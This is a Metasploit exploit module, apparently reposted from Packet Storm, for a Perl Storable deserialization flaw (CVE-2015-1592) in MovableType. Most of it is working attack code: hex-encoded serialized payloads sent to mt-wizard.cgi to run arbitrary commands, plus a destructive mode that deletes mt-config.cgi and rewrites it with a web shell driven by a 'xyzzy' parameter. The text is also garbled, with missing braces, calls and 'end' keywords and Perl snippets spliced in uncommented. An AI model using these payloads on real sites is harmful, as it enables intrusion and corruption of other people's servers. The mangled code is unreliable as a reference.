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SixApart MovableType Storable Perl Code Execution

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# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
'Name' => 'SixApart MovableType Storable Perl Code Execution',
'Description' => %q{
This module exploits a serialization flaw in MovableType before 5.2.12 to execute
arbitrary code. The default nondestructive mode depends on the target server having
the Object::MultiType and DateTime Perl modules installed in Perl's @InC paths.
The destructive mode of operation uses only required MovableType dependencies,
but it will noticeably corrupt the MovableType installation.
'Author' =>
'John Lightsey',
'License' => MSF_LICENSE,
'References' =>
[ 'CVE', '2015-1592' ],
[ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
'Privileged' => false, # web server context
'Payload' =>
'DisableNops' => true,
'BadChars' => ' ',
'Space' => 1024,
'Compat' =>
'PayloadType' => 'cmd'
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Feb 11 2015',
'DefaultTarget' => 0))

OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),
OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
], self.class




# generate config parameters for injection checks

use Storable;



sub STORABLE_thaw {
return 1;

sub STORABLE_freeze {
return 1;


my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
$frozen = unpack 'H*', $frozen;
print "LFI test for storable flaw is: $frozen\n";

package DateTime;
use overload '+' => sub { 'ignored' };


def check
vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'

unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test");
return Exploit::CheckCode::Safe

def exploit
if datastore['DESTRUCTIVE'] == true



# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.

use Storable;

package Object::MultiType;
use overload '+' => sub { 'ingored' };

package Object::MultiType::Saver;

package DateTime;
use overload '+' => sub { 'ingored' };

package Try::Tiny::ScopeGuard;

my $try_tiny_loader = bless {}, 'DateTime';
my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';

my $data = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";


def exploit_nondestructive
print_status("#{peer} - Using nondestructive attack method")
config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
config_payload << payload.encoded.unpack('H*')[0]
config_payload << "7d293b"
config_payload << "23" * (1025 - payload.encoded.length)
config_payload << "0a657869743b"

print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")

'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => config_payload
}, 5)



# Generate destructive config parameter to unlink mt-config.cgi

use Storable;

package CGITempFile;

my $unlink_target = "mt-config.cgi";
my $cgitempfile = bless \$unlink_target, "CGITempFile";

my $data = [$cgitempfile];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE unlink payload requiring CGI: $frozen\n";


def exploit_destructive
print_status("#{peer} - Using destructive attack method")
# First we need to delete mt-config.cgi using the storable injection

print_status("#{peer} - Sending storable injection to unlink mt-config.cgi")

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'

if res && res.code == 200
print_status("Successfully sent unlink request")
fail_with(Failure::Unknown, "Error sending unlink request")

# Now we rewrite mt-config.cgi to accept a payload

print_status("#{peer} - Rewriting mt-config.cgi to accept the payload")

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'next_step',
'step' => 'optional',
'default_language' => 'en_us',
'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
'set_static_uri_to' => '/',
'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',

if res && res.code == 200
print_status("Successfully sent mt-config rewrite request")
fail_with(Failure::Unknown, "Error sending mt-config rewrite request")

# Finally send the payload

print_status("#{peer} - Sending payload request")

'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt.cgi'),
'vars_get' => {
'xyzzy' => payload.encoded,
}, 5)


Surs?: http://dl.packetstormsecurity.net/1505-exploits/sixapart_movabletype_storable_exec.rb.txt

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